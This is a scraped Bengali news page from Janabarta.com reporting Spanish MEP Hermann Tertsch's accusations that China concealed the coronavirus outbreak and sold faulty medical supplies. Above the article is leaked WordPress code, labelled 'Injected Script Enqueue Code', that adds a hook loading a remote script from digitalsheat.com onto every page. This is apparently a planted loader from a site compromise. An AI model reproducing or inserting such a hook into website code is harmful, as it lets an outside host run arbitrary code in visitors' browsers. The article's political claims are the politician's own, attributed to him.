// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site করোনা বিপর্যয়ের জন্য চীনকে দায়ী করছে স্পেন - Janabarta.com

করোনা বিপর্যয়ের জন্য চীনকে দায়ী করছে স্পেন

আন্তর্জাতিক ডেস্কঃ করোনাভাইরাসের সংক্রমণে বিশ্বব্যাপী যে বিপর্যয় নেমে এসেছে তার জন্য চীনকে দায়ী করেছেন ইউরোপীয় পার্লামেন্টে নিয়োজিত স্পেনের এক জ্যেষ্ঠ সদস্য। এর আগে পশ্চিমা বিশ্ব থেকে আকারে-ইঙ্গিতে বেশ কয়েকবার করোনাভাইরাসের প্রাদুর্ভাবের কারণে দেশটিকে দায়ী করা হলেও এবার সরাসরি আক্রমণ শানাল স্পেন।

চীনের তীব্র সমালোচনা করে ইউরোপীয় পার্লামেন্টের স্প্যানিশ সদস্য হারমান টার্টচ বলেন, করোনার বিস্তার নিয়ে বিশ্বের কাছে ভুল তথ্য দিয়েছে চীন।উদ্দেশ্যেমূলকভাবে তারা বিষয়টাকে গোপন করেছে। গোটা বিশ্বকে ভয়াবহ শাস্তির মুখে ঠেলে দেওয়ার জন্য অনেক কিছু জানার পরও নীরব থাকার সিদ্ধান্ত নিয়েছে তারা।

টার্টচ বলেন, চীনের ক্ষমতাসীন কমিউনিস্ট পার্টির নেতৃত্ব গত নভেম্বরেই এই ভাইরাসের ব্যাপারে বিস্তারিত জানতে পারে। কিন্তু তারা তথ্য গোপন করে বিশ্বকে ভুল বার্তা দেয়। আজকের এই হাজার হাজার মানুষের প্রাণহানির জন্য তাই সরাসরি চীন দায়ী। এর জন্য দেশটিকে জবাবদিহিতার আওতায় আনতে হবে।

বেলজিয়াম থেকে প্রকাশিত ‘নিউ ইউরোপ’ নামক সংবাদপত্রে লিখিত এক নিবন্ধে হারমান টার্টচ বলেন, চীনে যে ডাক্তার প্রথম করোনাভাইরাস নামের এই মহামারির তথ্য দিয়ে সরকারকে সতর্ক করতে চাইলেন, তাকে গুম করে ফেলা হল। কণ্ঠরোধ করা হয়েছে অন্যান্য ডাক্তারদেরও। শুধু তাই নয়, এই ভাইরাসের সংক্রমণে ইউরোপের যখন শোচনীয় অবস্থা তখন চীন সাহায্যের নামে দ্বিগুণ দামে পাঠাল ভেজালে পরিপূর্ণ মেডিকেল সরঞ্জাম!

‘বিশ্বের জন্য নতুন হুমকি হয়ে উঠেছে চীন’ মন্তব্য করে টার্টচ বলেন, শিগগিরই দেশটির ব্যাপারে ইউরোপীয় ইউনিয়নে আলোচনার আহ্বান জানাবেন তিনি।